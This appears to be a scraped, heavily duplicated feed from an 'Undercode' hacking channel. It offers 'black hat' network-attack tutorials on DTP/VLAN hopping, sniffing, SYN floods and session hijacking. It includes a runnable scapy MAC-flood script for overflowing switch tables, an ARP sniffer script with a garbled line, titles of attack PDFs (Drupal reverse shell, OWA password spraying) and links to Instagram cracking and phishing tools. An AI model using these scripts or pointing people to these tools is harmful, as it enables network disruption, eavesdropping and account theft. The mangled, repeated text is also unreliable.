β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python black hat programming 3.5 DTP attack
1) Dynamic Trunking Protocol DTP (Dynamic Trunking Protocol) is a Cisco proprietary protocol. DTP is used for the directly connected Layer 2 ports of two switches to detect the configuration of the opposite end, and automatically negotiate the link type of the Layer 2 port and Ethernet protocol encapsulation to adapt to the opposite end. In this way,
2) when the peer device is modified, there is no need to manually modify the local configuration, and it can be changed adaptively through the protocol. The important role of DTP is that plug and play can be realized when the network is uncertain; when modifying the network topology, there is no need to manually modify the configuration of the second layer port.
3) DTP uses the second layer of relay frames to communicate between the directly connected ports of two switches. DTP packets are limited to the communication between two directly connected ports, maintaining the link type and Ethernet encapsulation type of the two directly connected ports
4) If the switch is enabled with the DTP protocol, the attacker will pretend to be the switch and send Dynamic desirable packets to the target switch , then the target port will be turned into a trunking port, which means that we can enter any VLAN by modifying the configuration of the machine , and at the same time we can use 3.4 The method of this section performs VLAN hopping attacks and monitors all data.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python black hat programming 3.5 DTP attack
1) Dynamic Trunking Protocol DTP (Dynamic Trunking Protocol) is a Cisco proprietary protocol. DTP is used for the directly connected Layer 2 ports of two switches to detect the configuration of the opposite end, and automatically negotiate the link type of the Layer 2 port and Ethernet protocol encapsulation to adapt to the opposite end. In this way,
2) when the peer device is modified, there is no need to manually modify the local configuration, and it can be changed adaptively through the protocol. The important role of DTP is that plug and play can be realized when the network is uncertain; when modifying the network topology, there is no need to manually modify the configuration of the second layer port.
3) DTP uses the second layer of relay frames to communicate between the directly connected ports of two switches. DTP packets are limited to the communication between two directly connected ports, maintaining the link type and Ethernet encapsulation type of the two directly connected ports
4) If the switch is enabled with the DTP protocol, the attacker will pretend to be the switch and send Dynamic desirable packets to the target switch , then the target port will be turned into a trunking port, which means that we can enter any VLAN by modifying the configuration of the machine , and at the same time we can use 3.4 The method of this section performs VLAN hopping attacks and monitors all data.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python black hat programming 3.5 DTP attack
1) Dynamic Trunking Protocol DTP (Dynamic Trunking Protocol) is a Cisco proprietary protocol. DTP is used for the directly connected Layer 2 ports of two switches to detect the configuration of the opposite end, and automatically negotiate the link type of the Layer 2 port and Ethernet protocol encapsulation to adapt to the opposite end. In this way,
2) when the peer device is modified, there is no need to manually modify the local configuration, and it can be changed adaptively through the protocol. The important role of DTP is that plug and play can be realized when the network is uncertain; when modifying the network topology, there is no need to manually modify the configuration of the second layer port.
3) DTP uses the second layer of relay frames to communicate between the directly connected ports of two switches. DTP packets are limited to the communication between two directly connected ports, maintaining the link type and Ethernet encapsulation type of the two directly connected ports
4) If the switch is enabled with the DTP protocol, the attacker will pretend to be the switch and send Dynamic desirable packets to the target switch , then the target port will be turned into a trunking port, which means that we can enter any VLAN by modifying the configuration of the machine , and at the same time we can use 3.4 The method of this section performs VLAN hopping attacks and monitors all data.
π¦Python black hat programming 3.5 DTP attack
1) Dynamic Trunking Protocol DTP (Dynamic Trunking Protocol) is a Cisco proprietary protocol. DTP is used for the directly connected Layer 2 ports of two switches to detect the configuration of the opposite end, and automatically negotiate the link type of the Layer 2 port and Ethernet protocol encapsulation to adapt to the opposite end. In this way,
2) when the peer device is modified, there is no need to manually modify the local configuration, and it can be changed adaptively through the protocol. The important role of DTP is that plug and play can be realized when the network is uncertain; when modifying the network topology, there is no need to manually modify the configuration of the second layer port.
3) DTP uses the second layer of relay frames to communicate between the directly connected ports of two switches. DTP packets are limited to the communication between two directly connected ports, maintaining the link type and Ethernet encapsulation type of the two directly connected ports
4) If the switch is enabled with the DTP protocol, the attacker will pretend to be the switch and send Dynamic desirable packets to the target switch , then the target port will be turned into a trunking port, which means that we can enter any VLAN by modifying the configuration of the machine , and at the same time we can use 3.4 The method of this section performs VLAN hopping attacks and monitors all data.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NETWORK ATTACK TIPS BY UNDERCODE :
> TCP/IP is the core of the entire network protocol system, because from here on, data transmission has moved from the local area network to the vast Internet, program is also capable of processing data from the Internet, and can directly attack and test hosts on the Internet. .
> Still an old saying, I hope you will learn the protocol in depth, practice packet analysis through packet capture tools, and understand the protocol through examples :
A)
1)) PRINCIPLES OF SNIFFING AND SNIFFER
Sniffing is a comprehensive concept that involves the second layer we talked about before and the application layer that we will talk about in the future. Data sniffing is a way of passive attack. It extracts the required information by analyzing the data flowing through the local network card.
2) According to different network types, we may have to combine ARP spoofing /DNS spoofing to get the data of the target host we want.
3) Sniffer is a tool used to obtain and analyze data. There are many such tools on the Internet. Our focus is on the principles and coding implementation of these tools.
B) IP POISONING ATTACK AND FLOOD ATTACK
1) The previous ARP poisoning attack is similar. IP poisoning is to construct fake IP data packets and use fake IP addresses to attack or hide yourself.
2) At this layer, we can construct various data packets to flood the devices on the Internet, such as SYN floods and connection flood attacks of various protocols.
C) PORT SCANNING AND SERVICE DETECTION
zmap and nmap are our commonly used port scanning and service detection programs. We also know that there are many different implementation techniques for port scanning, from simple full connections to half-open connections. It is said that zmap can scan the entire Internet in one hour . What advanced technology does it use? I will reveal the secrets for you one by one here on undercode testing :
D) SESSION HIJACKING
1) "Hijacking" is a very important concept. Only by intercepting the flow of data can we have the opportunity to tamper with data and forge normal conversations. The goal of common sessions is the data concept of the application layer, but hijacking is done at the transport layer.
2) We will see practical examples of how to implement session hijacking and data tampering through programming.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NETWORK ATTACK TIPS BY UNDERCODE :
> TCP/IP is the core of the entire network protocol system, because from here on, data transmission has moved from the local area network to the vast Internet, program is also capable of processing data from the Internet, and can directly attack and test hosts on the Internet. .
> Still an old saying, I hope you will learn the protocol in depth, practice packet analysis through packet capture tools, and understand the protocol through examples :
A)
1)) PRINCIPLES OF SNIFFING AND SNIFFER
Sniffing is a comprehensive concept that involves the second layer we talked about before and the application layer that we will talk about in the future. Data sniffing is a way of passive attack. It extracts the required information by analyzing the data flowing through the local network card.
2) According to different network types, we may have to combine ARP spoofing /DNS spoofing to get the data of the target host we want.
3) Sniffer is a tool used to obtain and analyze data. There are many such tools on the Internet. Our focus is on the principles and coding implementation of these tools.
B) IP POISONING ATTACK AND FLOOD ATTACK
1) The previous ARP poisoning attack is similar. IP poisoning is to construct fake IP data packets and use fake IP addresses to attack or hide yourself.
2) At this layer, we can construct various data packets to flood the devices on the Internet, such as SYN floods and connection flood attacks of various protocols.
C) PORT SCANNING AND SERVICE DETECTION
zmap and nmap are our commonly used port scanning and service detection programs. We also know that there are many different implementation techniques for port scanning, from simple full connections to half-open connections. It is said that zmap can scan the entire Internet in one hour . What advanced technology does it use? I will reveal the secrets for you one by one here on undercode testing :
D) SESSION HIJACKING
1) "Hijacking" is a very important concept. Only by intercepting the flow of data can we have the opportunity to tamper with data and forge normal conversations. The goal of common sessions is the data concept of the application layer, but hijacking is done at the transport layer.
2) We will see practical examples of how to implement session hijacking and data tampering through programming.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TCP port scanning is generally divided into the following types:
1) TCP connect scan: also known as full connection scan, this method directly connects to the target port and completes the TCP three-way handshake process. The scan result of this method is more accurate, but the speed is slower and can be easily detected by the target system.
2) TCP SYN scanning: also called semi-open scanning, this method will send a SYN packet, start a TCP session, and wait for the target to respond to the data packet. If a RST packet is received, it indicates that the port is closed, and if a SYN/ACK packet is received, it indicates that the corresponding port is open.
3) Tcp FIN scanning: In this way, a FIN packet indicating the teardown of an active TCP connection is sent, and the other party closes the connection. If a RST packet is received, it indicates that the corresponding port is closed.
4) TCP XMAS scanning: This method sends packets with PSH, FIN, URG, and TCP flags set to 1. If a RST packet is received, it indicates that the corresponding port is closed.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TCP port scanning is generally divided into the following types:
1) TCP connect scan: also known as full connection scan, this method directly connects to the target port and completes the TCP three-way handshake process. The scan result of this method is more accurate, but the speed is slower and can be easily detected by the target system.
2) TCP SYN scanning: also called semi-open scanning, this method will send a SYN packet, start a TCP session, and wait for the target to respond to the data packet. If a RST packet is received, it indicates that the port is closed, and if a SYN/ACK packet is received, it indicates that the corresponding port is open.
3) Tcp FIN scanning: In this way, a FIN packet indicating the teardown of an active TCP connection is sent, and the other party closes the connection. If a RST packet is received, it indicates that the corresponding port is closed.
4) TCP XMAS scanning: This method sends packets with PSH, FIN, URG, and TCP flags set to 1. If a RST packet is received, it indicates that the corresponding port is closed.
E N J O Y β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Drupal_ Reverseshell.pdf
669.6 KB
Remote Code Execution: Remote Code Evaluation is a vulnerability that occurs because of the unsafe handling of inputs by the server application or that can be exploited if user input is injected into a File or a String and executed by the programming languageβs parser or the user input is not sanitised properly in POST request and also when accepting query string param during GET requests.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦cross-domain VLAN:
VLAN (Virtual Local Area Network) is a virtual network constructed based on the Ethernet interactive technology. It can divide the same physical network into multiple VLANs , or it can cross the physical network barriers and assign users in different subnets to the same VLAN.
π¦There are many ways to implement VLAN , based on the VLAN division of switching equipment , there are generally two:
1) Switch-based port division
2) Based on IEEE 802.1q protocol, extended Ethernet frame format
> The second layer based VLAN technology, there Trunking concept, Trunking is used to switch between different connections, to ensure that the established across a plurality of switches on the same VLAN members can communicate with each other.
> The ports used for interconnection between switches are called Trunk ports. In addition to 802.1q , Cisco has its own Trunk protocol called ISL .
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦cross-domain VLAN:
VLAN (Virtual Local Area Network) is a virtual network constructed based on the Ethernet interactive technology. It can divide the same physical network into multiple VLANs , or it can cross the physical network barriers and assign users in different subnets to the same VLAN.
π¦There are many ways to implement VLAN , based on the VLAN division of switching equipment , there are generally two:
1) Switch-based port division
2) Based on IEEE 802.1q protocol, extended Ethernet frame format
> The second layer based VLAN technology, there Trunking concept, Trunking is used to switch between different connections, to ensure that the established across a plurality of switches on the same VLAN members can communicate with each other.
> The ports used for interconnection between switches are called Trunk ports. In addition to 802.1q , Cisco has its own Trunk protocol called ISL .
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAC flood Attack :
1) A PC keeps sending data frames to unknown destinations, and the source MAC address of each packet is different. When such a data packet is sent fast enough, it will quickly fill the switch's CAM table within the refresh time. full. CAM table is these fake MAC occupy address, real MA C address entry can not enter CAM table. Then any normal unicast data frame passing through the switch will be processed in the form of a broadcast frame. The switch is downgraded to Hub in this case .
2) After the switch is downgraded to hub , we can monitor the data of all hosts connected to the switch.
Of course, the response of specific interactive devices to the ARP flood is different, and field testing is required. Next we enter the programming link.
π¦ TO DO :
1) There are many ways to construct random MAC and IP addresses, because the standard format of the address is there and it is easy to assemble. What I want to introduce here is the RandMAC and RandIP methods in the scapy module . These two methods are used to randomly generate MAC addresses and IP addresses, and the methods receive template parameters to generate addresses for specific network segments.
For example, the following code:
For example ARP packet:
Ether (src= RandMAC (),dst= "FF:FF:FF:FF:FF:FF" )/ARP(op= 2 , psrc= "0.0.0.0" , hwdst= "FF:FF:FF:FF: FF:FF" )/ Padding (load= "X" 18 ))
For example ICMP package:
Ether(src=RandMAC(":::::"),
dst=RandMAC(":::::")) / \
IP(src=RandIP("..."),
dst=RandIP("...")) / \
ICMP()
3) #!/usr/bin/python
import sys
from scapy.all import
import time
iface="eth0"
if len(sys.argv)>=2:
iface=sys.argv1
while(1):
packet= Ether(src=RandMAC(":::::"),
dst=RandMAC(":::::")) / \
IP(src=RandIP("..."),
dst=RandIP("...")) / \
ICMP()
time.sleep(0.5)
sendp(packet,iface=iface,loop=0)
Now the code implements MAC flood attack by continuously sending ICMP packets β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAC flood Attack :
1) A PC keeps sending data frames to unknown destinations, and the source MAC address of each packet is different. When such a data packet is sent fast enough, it will quickly fill the switch's CAM table within the refresh time. full. CAM table is these fake MAC occupy address, real MA C address entry can not enter CAM table. Then any normal unicast data frame passing through the switch will be processed in the form of a broadcast frame. The switch is downgraded to Hub in this case .
2) After the switch is downgraded to hub , we can monitor the data of all hosts connected to the switch.
Of course, the response of specific interactive devices to the ARP flood is different, and field testing is required. Next we enter the programming link.
π¦ TO DO :
1) There are many ways to construct random MAC and IP addresses, because the standard format of the address is there and it is easy to assemble. What I want to introduce here is the RandMAC and RandIP methods in the scapy module . These two methods are used to randomly generate MAC addresses and IP addresses, and the methods receive template parameters to generate addresses for specific network segments.
For example, the following code:
2) After the random problem is solved, what kind of data packets can we consider below to achieve the goal? Looking back at the content mentioned above, as long as we have the specified source IP and MAC in the data packet , the switch will record it.
from scapy.all import *
i=5
while(i):
print RandMAC()
print RandIP()
i=i-1
For example ARP packet:
Ether (src= RandMAC (),dst= "FF:FF:FF:FF:FF:FF" )/ARP(op= 2 , psrc= "0.0.0.0" , hwdst= "FF:FF:FF:FF: FF:FF" )/ Padding (load= "X" 18 ))
For example ICMP package:
Ether(src=RandMAC(":::::"),
dst=RandMAC(":::::")) / \
IP(src=RandIP("..."),
dst=RandIP("...")) / \
ICMP()
3) #!/usr/bin/python
import sys
from scapy.all import
import time
iface="eth0"
if len(sys.argv)>=2:
iface=sys.argv1
while(1):
packet= Ether(src=RandMAC(":::::"),
dst=RandMAC(":::::")) / \
IP(src=RandIP("..."),
dst=RandIP("...")) / \
ICMP()
time.sleep(0.5)
sendp(packet,iface=iface,loop=0)
Now the code implements MAC flood attack by continuously sending ICMP packets β€οΈππ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
InfoZip UnZip 6.00 and 6.1c22 Buffer Overflow .pdf
1.6 MB
#full guide with pictures
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ARP SNIFF CODE- not git :
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ARP SNIFF CODE- not git :
@UndercodeTesting
from scapy.all import sniff,ARP
from signal import signal,SIGINT
import sys
ip_mac = {}
def watchArp(pkt):
if point [ARP] .op == 2:
print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
# Device is new. Remember it.
if ip_mac.get(pkt[ARP].psrc) == None:
print "Found new device " + \
pkt[ARP].hwsrc + " " + \
pkt[ARP].psrc
ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
# Device is known but has a different IP
elif ip_mac.get(pkt[ARP].psrc) and ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
print pkt[ARP].hwsrc + \
" has got new ip " + \
pkt[ARP].psrc + \
" (old " + ip_mac[pkt[ARP].psrc] + ")"
ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
sniff(prn=watchArp,filter="arp",iface="eth0",store=0);
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Building_a_Keyword_Monitoring_Pipeline_with_Python,_Pastebin_and.pdf
543.3 KB
Building a Keyword Monitoring Pipeline with Python, Pastebin and Searx
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Discover and Hack URL handlers :
URL handlers are the bits in the front of the URLs (e.g. http:, https:, ftp:, skype:). They add things a web page can do to you and your device. Surprising applications have a nasty habit to register these without asking
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone git clone https://github.com/ouspg/urlhandlers.git
2) cd handlers/web
3) ./osx/handlers-list.py > handlers.json
4) python -m SimpleHTTPServer 8080
F E A T U R E S :
-Launcher for the OSX Launch Services
-OSX open CLI tool
-Online JavaScript based testing UI for the Browsers
-HTML file with direct invocation (e.g. iframe)
-HTML redirects
β GIT TOPIC
@undercodeTesting
@UndercodeHacking
@Undercodesecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Discover and Hack URL handlers :
URL handlers are the bits in the front of the URLs (e.g. http:, https:, ftp:, skype:). They add things a web page can do to you and your device. Surprising applications have a nasty habit to register these without asking
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone git clone https://github.com/ouspg/urlhandlers.git
2) cd handlers/web
3) ./osx/handlers-list.py > handlers.json
4) python -m SimpleHTTPServer 8080
F E A T U R E S :
-Launcher for the OSX Launch Services
-OSX open CLI tool
-Online JavaScript based testing UI for the Browsers
-HTML file with direct invocation (e.g. iframe)
-HTML redirects
β GIT TOPIC
@undercodeTesting
@UndercodeHacking
@Undercodesecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ouspg/urlhandlers: Discover and Hack URL handlers
Discover and Hack URL handlers. Contribute to ouspg/urlhandlers development by creating an account on GitHub.
From broken link to subfolder takeover on Bukalapak.pdf
187.4 KB
From broken link to subfolder takeover on Bukalapak #requested
Forwarded from UNDERCODE SECURITY
Password Spraying Outlook Web Access_ Remote Shell.pdf
617.7 KB
Full with pictures
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INSTAGRAM HACKING TOOLS "
https://github.com/fuck3erboy/instahack
https://github.com/Pure-L0G1C/Instagram
https://github.com/04x/instagramCracker
https://github.com/DarkSecDevelopers/HiddenEye
https://github.com/suljot/shellphish
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INSTAGRAM HACKING TOOLS "
https://github.com/fuck3erboy/instahack
https://github.com/Pure-L0G1C/Instagram
https://github.com/04x/instagramCracker
https://github.com/DarkSecDevelopers/HiddenEye
https://github.com/suljot/shellphish
β β β Uππ»βΊπ«Δπ¬πβ β β β